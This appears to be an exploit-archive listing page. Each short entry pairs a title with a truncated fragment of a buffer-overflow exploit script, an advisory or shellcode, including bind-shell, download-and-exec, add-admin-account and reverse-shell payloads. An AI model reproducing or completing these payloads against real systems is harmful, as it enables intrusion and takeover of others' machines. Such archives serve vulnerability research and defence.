Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5384/info Inso DynaWeb webserver, dwhttpd, is used as a subcomponent in products such as Sun's AnswerBook2, which is shipped as part of the Solaris operating environment. The dwhttpd webserver is prone to a remotely...

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes

No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include sys/types.h include stdio.h include string.h char scode = \x99 // cltd...

Image22 ActiveX 1.1.1 - Buffer Overflow Exploit

No description provided by source. html object classid='clsid:1DC09FDF-2EF8-4CE9-ADEA-4D6A98A2F779' id='target'/object script language='vbscript' ' 988 bytes for shellcode ' bind shell port 4444 sc = unescape%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49 &...

os-x/ppc sync(), reboot() 32 bytes

No description provided by source. / MacOSX/PowerPC Shellcode for: sync, reboot 32 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include stdio.h include string.h char shellcode = \x7c\x63\x1a\x79 \x39\x40\x01\x06 \x38\x0a\xff\x1e \x44\xff\xff\x02 \x60\x60\x60\x60 \x39\x40\x01\x19...

Picasm 1.10/1.12 Error Generation Remote Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13698/info Picasm is affected by a remote buffer overflow vulnerability. An attacker can exploit this issue by supplying an excessive 'error' directive. If successfully exploited, this issue can allow a remote attacker to...

S.u.S.E. 5.2 lpc Vulnerabilty

No description provided by source. source: http://www.securityfocus.com/bid/328/info The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc...

linux/x86 chroot & standart 66 bytes

No description provided by source. / Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru ---------------------------------------------------------------------------------------------- / / Mkdir and Chroot are written in C: / includestdio.h includeunistd.h includesys/types.h...

A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow

No description provided by source. Exploit Title: A-PDF WAV to MP3 Converter 1.0.0 .m3u Stack Buffer Overflow Author: d4rk-h4ck3r Date: 2010-07-17 Software Link: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html Greetz 2 : PASSEWORD , KAiSER-J , sec4ever , tli7a , All Tun!Sian...

AOL 9.5 (rtx) Local Buffer Overflow Exploit

No description provided by source. !/usr/bin/python Bug : AOL 9.5 rtx Local Buffer Overflow Exploit by sup3r Tested on : XP SP3 header1 = \x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a \x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41...

Unrar 3.9.3 - Local Stack Overflow Exploit

No description provided by source. !/usr/bin/perl =head1 TITLE Winrar = v3.93 Local Stack-based Overflow exploit =head2 DESCRIPTION This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor. It was not developped to bypass non-executing stack...

RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)

No description provided by source. !/usr/bin/python Title: RM Downloader 3.0.2.1 .asx Local Buffer Overflow SEH Date: 03-29-2010 Author: b0telh0 Link: http://www.mini-stream.net/downloads/RMDownloader.exe Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode ...

httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)

No description provided by source. !/usr/bin/python Usage : httpdxcwd.py targetip user pass Example : httpdxcwd.py 192.168.1.3 ftp 123 Stack encouraged me to exploit this bug , so thx brotha | || | / \ | | | | | | | | | - | | | / / | | |||| || // / |\ || Bug : httpdx = 0.5b FTP Server CWD Remote...

ASX to MP3 Converter 3.0.0.100 - Local stack overflow exploit

No description provided by source. !/usr/bin/python import time ASX to MP3 Converter Version 3.0.0.100 = Local stack overflow exploit Author: Hazem Mofeed PoC: http://www.exploit-db.com/exploits/11930 Tested On: Windows Xp Home Edition SP3 Home: http://hakxer.wordpress.com print ' Exploited by...

Triologic Media Player 8 (.m3u) Local Universal Unicode Buffer Overflow (SEH)

No description provided by source. Exploit Title: Triologic Media Player 8 .m3u Local Universal Unicode Buffer Overflow SEH Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom Software Link: http://download.cnet.com/Triologic-Media-Player/3000-21394-10691520.html Version:...

MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4)

No description provided by source. source: http://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based...

WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit

No description provided by source. / WinZip = 10.0.7245 FileView ActiveX buffer overflow exploit ============================================================ A vulnerability has been identified within Winzip that allows remote attackers to execute arbitrary code. User interaction is required to...

Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x

No description provided by source. !/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP...

win32 Download & Exec Shellcode 226 bytes+

No description provided by source. / \ WINSHELLCODE / :: win32 download & exec shellcode :: \ :: by Darkeagle of Unl0ck Research Team http://exploiterz.org :: / :: to avoid 0x00 use ^^xor^^ : :: \ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. :: / ::cya:: \ / include stdio.h...

win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes

No description provided by source. Title : win32/xp sp3 Tr Add Admin Account Shellcode 127 bytes Proof : http://img823.imageshack.us/img823/1017/addqx.jpg Desc. : usr: zrl , pass: 123456 , localgroup: Administrator Author : ZoRLu / http://inj3ct0r.com/author/577 mail-msn :...

Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes

No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...